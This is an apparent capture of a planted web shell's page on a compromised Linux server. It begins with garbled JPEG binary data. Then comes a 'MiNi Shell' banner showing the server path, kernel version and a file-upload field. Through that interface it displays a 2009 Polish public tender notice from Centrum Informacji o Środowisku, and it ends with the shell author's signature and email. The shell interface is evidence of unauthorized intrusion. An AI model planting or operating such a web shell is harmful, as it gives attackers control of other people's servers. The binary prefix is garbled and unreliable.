JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090918/324576-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentów niezbędnych do podpisania umowy o dofinansowanie projektu: Platforma usług elektronicznych dla przedsiębiorców korzystających ze środowiska (POIG 7-19)</b><br>
<b>Numer ogłoszenia: 324576 - 2009; data zamieszczenia: 18.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Informacji o Środowisku , ul. Wawelska 52/54, 00-922 Warszawa, woj. mazowieckie, tel. 022 5792211 lub 215, faks 022 5792688.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cios.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentów niezbędnych do podpisania umowy o dofinansowanie projektu: Platforma usług elektronicznych dla przedsiębiorców korzystających ze środowiska (POIG 7-19).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie następujących dokumentów w ramach realizacji projektu: Platforma usług elektronicznych dla przedsiębiorców korzystających ze środowiska (Program Operacyjny Innowacyjna Gospodarka 2007-2013, Priorytet VII Społeczeństwo informacyjne. Budowa elektronicznej administracji):

(i) wniosek o dofinansowanie projektu ze środków Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Priorytet VII Społeczeństwo informacyjne. Budowa elektronicznej administracji,

(ii) studium wykonalności projektu zawierające harmonogram rzeczowo-finansowy projektu,

(iii) wstępna dokumentacja techniczna projektu,

(iv) pozostałe wymagane załączniki do wniosku o dofinansowanie określonego w punkcie  II.1.3.(i).

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku 1 do SIWZ Szczegółowy opis przedmiotu zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą spełniać następujące warunki udziału w postępowaniu:

1)	posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, musi być spełniony przez każdego z tych Wykonawców. Ocena spełniania warunku określonego w pkt. 1) zostanie dokonana na podstawie przedłożonych dokumentów wg zasady spełnia-nie spełnia.

2)	nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, zwanej dalej ustawą Pzp, oraz złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, warunek dotyczący nie podlegania wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp, musi być spełniony przez każdego z tych Wykonawców. Ocena spełniania warunku określonego w pkt. 2) zostanie dokonana na podstawie przedłożonych dokumentów wg zasady spełnia-nie spełnia.

3)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

4)	Wykonawca musi dysponować co najmniej 3 specjalistami lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia takich specjalistów, którzy w przedmiotowym zamówieniu będą pełnili następujące funkcje:
a.	Specjalista ds. analiz finansowych i księgowości.
b.	Specjalista ds. analiz systemów informatycznych i telekomunikacyjnych.
c.	Specjalista ds. projektów dofinansowanych ze środków Unii Europejskiej.
(Zamawiający dopuszcza, by jedna osoba pełniła jednocześnie dwie funkcje). 

5)	Zamawiający wymaga, aby specjaliści wymienieni w punkcie 4) posiadali następujące kwalifikacje:
a.	Specjalista ds. analiz finansowych i księgowości:
i.	wykształcenie wyższe w dziedzinie nauk ekonomicznych, zarządzania lub nauk technicznych z ukończonymi kursami podyplomowymi w zakresie nauk ekonomicznych.
b.	Specjalista ds. analiz systemów informatycznych i telekomunikacyjnych
i.	wykształcenie wyższe w dziedzinie matematyki, informatyki, fizyki lub nauk technicznych.
c.	Specjalista ds. projektów dofinansowanych ze środków Unii Europejskiej
i.	wykształcenie wyższe w dziedzinie nauk ekonomicznych, zarządzania lub nauk technicznych z ukończonymi kursami podyplomowymi w zakresie nauk ekonomicznych lub zarządzania.

6)	Zamawiający wymaga, aby specjaliści wymienieni w punkcie 4) posiadali następujące doświadczenie:
a.	Specjalista ds. analiz finansowych i księgowości - doświadczenie w przygotowywaniu następujących analiz i ocen:
i.	Analizy wariantów (metodą analizy Koszty/Korzyści lub analizy Dynamicznego Kosztu Jednostkowego DGC)
ii.	Analizy finansowej obejmującej przedstawienie nakładów inwestycyjnych przynajmniej w podziale na grupy wg Klasyfikacji Środków Trwałych lub poszczególne aktywa trwałe wg Ustawy o rachunkowości
iii.	Harmonogramu rzeczowo-finansowego
iv.	Nakładów odtworzeniowych, amortyzacji środków trwałych
v.	Analizy przychodów i kosztów projektu
vi.	Rachunku zysków i strat
vii.	Prognozy rachunku przepływów pieniężnych
viii.	Analizy wrażliwości ekonomicznej
ix.	Oceny efektywności społeczno-ekonomicznej
x.	Analizy ryzyka ekonomicznego
b.	Specjalista ds. analiz systemów informatycznych i telekomunikacyjnych - doświadczenie w przygotowywaniu następujących analiz, ocen i specyfikacji:
i.	Specyfikacji projektów infrastruktury informatycznej i telekomunikacyjnej
ii.	Specyfikacji metodyk realizacji projektów informatycznych i/lub telekomunikacyjnych
iii.	Analizy ryzyka technologicznego projektu
iv.	Harmonogramu realizacji przedsięwzięcia 
v.	Analizy zgodności z minimalnymi wymaganiami dla systemów teleinformatycznych
vi.	Analizy zgodności z wymaganiami dla rejestrów publicznych i wymiany informacji w formie elektronicznej
vii.	Analizy SWOT dla projektów informatycznych i/lub telekomunikacyjnych.
c.	Specjalista ds. projektów dofinansowanych ze środków Unii Europejskiej - doświadczenie w przygotowywaniu następujących dokumentów i analiz:
i.	Wniosku o dofinansowanie projektu z funduszy Unii Europejską
ii.	Analizy zgodności celów projektu z celami programów Unii Europejskiej
iii.	Analizy zgodności grupy odbiorców ostatecznych projektu z grupami określonymi w programach Unii Europejskiej
iv.	Analizy otoczenia społeczno-gospodarczego dla projektu dofinansowanego z funduszy Unii Europejskiej
v.	Analizy problemów wynikających z otoczenia projektu dofinansowanego z funduszy Unii Europejskiej
vi.	Analizy wpływu projektu na polityki horyzontalne Unii Europejskiej
vii.	Analizy zadań cząstkowych projektu pod kątem podlegania procedurom przetargowym
viii.	Analizy kwalifikowania wydatków w ramach programów Unii Europejskiej

7)	Zamawiający wymaga aby Wykonawca wykazał, że w okresie ostatnich 3 lat (przed dniem złożenia oferty), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, przygotował co najmniej trzy dokumentacje zawierające wniosek i studium wykonalności, na podstawie których były lub są realizowane projekty informatyczne finansowane lub współfinansowane ze środków Unii Europejskiej (m.in. funduszy strukturalnych, funduszy przedakcesyjnych PHARE, TRANSITION FACILITY, ISPA, funduszu programów ramowych, innych funduszy UE) o wartości projektów co najmniej 300 000 PLN (słownie trzysta tysięcy złotych) każdy. Dla ustalenia właściwej daty przygotowania wniosku uznaje się datę odbioru bez zastrzeżeń przez Zamawiającego.

8)	Ocena spełniania warunków określonych w pkt. 4)-7) zostanie dokonana na podstawie złożonych dokumentów wg. zasady spełnia-nie spełnia.

9)	Zamawiający wymaga aby Wykonawca znajdował się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, warunek dotyczący sytuacji ekonomicznej i finansowej, musi być spełniony łącznie przez tych Wykonawców. Ocena spełniania warunku określonego w pkt. 9) zostanie dokonana na podstawie przedłożonego oświadczenia wg zasady spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	W celu potwierdzenia spełnienia warunku wskazanego w punkcie III.2.1.1) dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Wykonawcy zobowiązani są przedłożyć: oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w sekcji III.2.1.2). W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie powinno być złożone łącznie przez wszystkich Wykonawców.

2)	W celu potwierdzenia spełnienia warunku wskazanego w punkcie III.2.1.2) dotyczącego nie podlegania wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych, Wykonawcy zobowiązani są przedłożyć: oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w sekcji III.2.1.2) oraz aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie, o którym mowa powyżej, powinno być złożone łącznie przez wszystkich Wykonawców natomiast aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej musi złożyć każdy z Wykonawców. 

3)	W celu potwierdzenia spełniania wskazanych w punktach III.2.1.4)-7) warunków dotyczących niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia Wykonawcy zobowiązani są przedłożyć: 

-	Wykaz specjalistów, którymi dysponuje lub będzie dysponował Wykonawca i którzy będą wykonywać usługi w ramach niniejszego zamówienia, zawierający następujące informacje: imię i nazwisko specjalisty; funkcję, jaką będzie wykonywał przy realizacji zamówienia; kwalifikacje i doświadczenie: krótki opis każdego z projektów, w których realizacji brał udział wskazany specjalista, opis zakresu wykonywanych czynności przez wskazanego specjalistę w każdym z projektów (odpowiednich do przewidywanej funkcji w niniejszym zamówieniu).

-	Pisemne zobowiązanie innych podmiotów do udostępnienia specjalistów, jeśli w wykazie, o którym mowa w pkt. 4) Wykonawca wskazał osoby, którymi będzie dysponował.

-	Wykaz zrealizowanych zamówień polegających na przygotowaniu dokumentacji zawierającej wniosek i studium wykonalności, na podstawie których były lub są realizowane projekty informatyczne finansowane w całości lub w części ze środków Unii Europejskiej (funduszy strukturalnych, funduszy przedakcesyjnych PHARE, TRANSITION FACILITY, ISPA, funduszu programów ramowych, innych funduszy UE), zawierający następujące informacje: nazwa projektu i jego krótki opis, nazwa i adres beneficjenta, wartość projektu, data przygotowania dokumentacji, fundusz Unii Europejskiej. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. wykazy i dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.

4)	Potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej o której mowa w punkcie III.2.1.9), nastąpi poprzez złożenie oświadczenia  o spełnianiu warunków udziału w postępowaniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie powinno być złożone łącznie przez wszystkich Wykonawców.

5)	Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty muszą być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument/zaświadczenie takie nie może być wystawione wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

6)	Wszystkie dokumenty, o których mowa powyżej, Wykonawca składa w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym, muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cios.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Informacji o Środowisku (CIOŚ)
ul. Wawelska 52/54
00-922 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 12:00, miejsce: Siedziba Centrum Informacji o Środowisku:
00-922 Warszawa, ul. Wawelska 52/54 pokój 56a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com